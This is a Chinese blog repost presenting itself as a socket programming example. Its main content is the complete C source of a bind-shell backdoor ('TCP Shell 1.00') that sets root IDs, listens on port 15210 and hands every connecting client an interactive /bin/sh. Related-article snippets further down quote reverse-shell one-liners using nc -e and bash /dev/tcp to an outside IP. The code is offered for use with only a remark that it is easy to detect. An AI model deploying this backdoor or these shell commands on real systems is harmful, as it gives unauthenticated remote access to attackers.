socket编程例子:TCP Shell后门

最新推荐文章于 2025-05-14 15:32:30 发布
最新推荐文章于 2025-05-14 15:32:30 发布
阅读量1.7k 收藏
点赞数
分类专栏: c/c++ 网络资源 文章标签: socket 编程 shell tcp struct stream
此博客介绍了一个简单的 TCP Shell 版本 1.00 的实现代码,该程序由 UNYUN 开发,通过监听指定端口并接受连接请求来启动 shell 会话。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

 来源:本文出自:http://sinbad.zhoubin.com 作者: 不详 (2002-12-12 06:02:00)

很简单很容易被发现,且当作socket编程例子学习吧。

/*============================================================================= 
   TCP Shell Version 1.00 
   The Shadow Penguin Security (http://shadowpenguin.backsection.net
   Written by UNYUN (unewn4th@usa.net) 
  ============================================================================= 
*/ 
#include <signal.h> 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <errno.h> 
#include <unistd.h> 
#include <netinet/in.h> 
#include <limits.h> 
#include <netdb.h> 
#include <arpa/inet.h> 

#define MAX_CLIENTS     5           /* Max client num    */ 
#define PORT_NUM        15210       /* Port              */ 

void    get_connection(socket_type, port, listener) 
int     socket_type; 
int     port; 
int     *listener; 

        struct sockaddr_in      address; 
        struct sockaddr_in      acc; 
        int                     listening_socket; 
        int                     connected_socket = -1
        int                     new_process; 
        int                     reuse_addr = 1
        int                     acclen=sizeof(acc); 

        memset((char *&address, 0sizeof(address)); 
        address.sin_family = AF_INET; 
        address.sin_port = htons(port); 
        address.sin_addr.s_addr = htonl(INADDR_ANY); 
        listening_socket = socket(AF_INET, socket_type, 0); 
        if (listening_socket < 0
          perror("socket"); 
          exit(1); 
        } 
        if (listener != NULL) *listener = listening_socket; 
        setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR, 
                   (void *)&reuse_addr,sizeof(reuse_addr)); 
        if (bind(listening_socket,(struct sockaddr *)&address,sizeof(address))<0 
)
          perror("bind"); 
          close(listening_socket); 
          exit(1); 
        } 
        if (socket_type == SOCK_STREAM)
          if (listen(listening_socket, MAX_CLIENTS)==-1)
            perror("listen"); 
            exit(1); 
         } 
        } 
} 
void    sock_puts(sockfd, str) 
int     sockfd; 
char    *str; 

        char    x[2000],*buf; 
        size_t  bytes_sent = 0
        int     this_write,count; 

        sprintf(x," %s",str); 
        count=strlen(x); 
        buf=x; 
        while (bytes_sent < count) 
                do 
                        this_write = write(sockfd, buf, count - bytes_sent); 
                while ( (this_write < 0&& (errno == EINTR) ); 
                if (this_write <= 0return
                bytes_sent += this_write; 
                buf += this_write; 
        } 
} 
int     main(argc, argv) 
int     argc; 
char    *argv[]; 

        void            get_connection(); 
        void            sock_puts(); 
        int             i,sz; 
        int             sock; 
        static int      listensock = -1
        struct sockaddr_in sad; 

        setuid(0); 
        setgid(0); 

        for (;;)
          get_connection(SOCK_STREAM, PORT_NUM, &listensock); 
          sz=sizeof(struct sockaddr_in); 
          for (;;)
            if ((sock=accept(listensock,(void *)&sad,&sz))==-1)
                perror("Accept"); 
                exit(1); 
            } 
            if (fork()==0)
                sock_puts(sock,"The ShadowPenguin Systems Inc. TCP Shell 1.00 De 
veloped by  

UNYUN. "); 
                for (i=0;i<3;i++)
                    close(i); dup2(sock,i); 
                } 
                execl("/bin/sh","sh","-i",0); 
                close(sock);      
                break
            } 
          } 
        } 
} 


内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4971
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
反弹shell流量分析与检测
欢迎光临
08-30 1530
常用的隧道技术:网络层:ipv6、Icmp、greIPv6隧道:将ipv6报文放入ipv4作为载体进行传输,工具:socat、6tunnelICMP隧道:将数据放入ping包中进行传输,工具:icmpsh、PingTunnelGRE隧道传输层:TCP隧道、UDP隧道、常规的端口转发。端口转发:没有端口限制就正常的内网端口转发,有端口限制就本地端口转发 工具:lcx、nc、powercatSOCKS代理:SOCKS代理可以理解为增强版的lcx。
利用socket编程实现的网络版shell命令解释器
04-30
利用socket编程实现的网络版shell命令解释器 内含两个代码包:分别用不同思路实现的
一个Socket编程例子
weixin_33964094的博客
10-26 106
#include &lt;signal.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/types.h&gt; #include &lt;sys/socket.h&gt; #include &lt;errno.h&gt; #include &amp
Shell命令到跨平台网络编程:Linux与Windows的socket实现
最新发布
weixin_42360733的博客
05-14 230
本篇博客深入探讨了Linux和Windows环境下socket编程的细节和差异。从Linux的man手册使用开始,逐渐过渡到Windows的MSDN文档库,再到跨平台编程socket函数的使用注意事项和关键差异。文章通过代码示例和API细节分析,为读者揭示了TCP网络通信的基础流程和设计跨平台网络通信库时应考虑的问题。
Socket编程实例
Code for Coffee
11-09 603
Socket 编程实例       首先介绍两个用于处理网络通信中地址问题的结构体:sockaddr和sockaddr_insockaddrstruct sockaddr { unsigned short sa_family; /* address family, AF_xxx */ char sa_data[14]; /* 14 bytes of protocol address */
shell建立socket连接
任我行的博客
12-20 5824
建立socket的两种方式 udp:/dev/udp/host/port tcp:/dev/tcp/host/port 直接重定向当前shell的一个文件描述符到对应的ip/端口: exec 8<>/dev/udp/10.0.2.15/12345 就相当于建立一个UDP socket。 发送报文: echo “” >&8 使用tcpdump抓包: 00:48:18.291...
Linux系统安全:反弹Shell脚本分析
在这个例子中,我们看到一个简单的C语言程序,用于创建一个反弹Shell。 首先,程序定义了几个关键变量: 1. `shell` 变量存储了要执行的系统命令,这里是 "/bin/sh",这是Linux系统的默认shell。 2. `message` 变量...
Python脚本编程秘法:用Kali Linux自动化渗透测试
Python是一种强大的编程语言,它的简单语法和丰富的库使得开发渗透测试工具变得相对容易。渗透测试,又称为渗透攻击,是一种通过模拟黑客攻击来评估计算机系统安全漏洞的方法。Python脚本在渗透测试中的作用主要体现...
Python逆向工程必备:Shell速查表工具详解
Python是一种广泛使用的高级编程语言,其设计理念强调代码的可读性和简洁的语法。在IT行业,Python不仅用于开发各种应用程序,而且还是在安全领域,特别是在网络安全领域,Python同样扮演着重要角色。本知识点将深入...
Linux socket编程实例:echo服务器程序
01-03
Linux socket编程实例:echo服务器程序
linux 下的shell socket实现聊天室
04-10
管道实现socket,资源资源包含服务器端和客服端。
Socket编程例子 - TCP Shell.c
无知的瞳仁 - 临时存储空间
05-22 899
/*============================================================================= TCP Shell Version 1.00 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (unewn4th@usa
shellsocket
笔记本+学习园
12-05 2585
参考 http://www.lslnet.com/linux/dosc1/54/linux-360985.htm exec 3 echo 'GET /index.html' >&3 cat
Linux系统shell查看SOCKET情况和socket编程概述
$好记性还是要多记录$
04-18 4218
Linux系统中,查看SOCKET使用情况可以使用ss命令。 1、命令格式: ss [参数] ss [参数] [过滤] 2、命令功能: ss(Socket Statistics的缩写)命令可以用来获取 socket统计信息,此命令输出的结果类似于 netstat输出的内容,但它能显示更多更详细的 TCP连接状态的信息,且比 netstat 更快速高效。它使用了 TCP协议栈中 tcp_diag(是...
基于ICMP和TCP原理的附带后门木马的程序
L_clearlove的博客
04-10 683
基于ICMP和TCP原理的附带后门木马的程序 原理: 从原始套接字的原理我们知道,我们可用自定义某个协议,如ICMP协议,而ICMP协议的数据包又可以由我们自己定义,而且ICMP协议发送数据是以广播的特点实现的,不需要知道目的端口,就像ping程序一样,随意ping某个ip,该ip主机只要有ICMP的接收程序就会自动接收。所以我们可以在目的ip的ICMP接收程序里面注入一个可以自动连接并返回sh...
Bash Socket 编程
sealbird的专栏
02-28 412
[code="java"]Bash Socket 编程 你可以在bash中开启一个socket链接,并且传输数据。Bash有两个特殊的设备文件: • /dev/tcp/host/port - 如果hostname,和port是合法的话,bash会尝试开启一个TCP连接。 • /dev/udp/host/port - 如果hostname和port是合法的话,bash会开启一个UD...
Linux Shell脚本编程--nc命令使用详解
热门推荐
上善若水,水善利万物而不争。
08-25 3万+
linux nc命令使用详解     功能说明:功能强大的网络工具 语 法:nc [-hlnruz][-g网关...>][-G指向器数目>][-i延迟秒数>][-o输出文件>][-p通信端口>][-s来源位址>][-v...][-w超时秒数>][主机名称][通信端口...] 参 数:  -g网关>  设置路由器跃程通信网关,最丢哦可设置8个。  -G指向器数目>  设置来源路由指
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值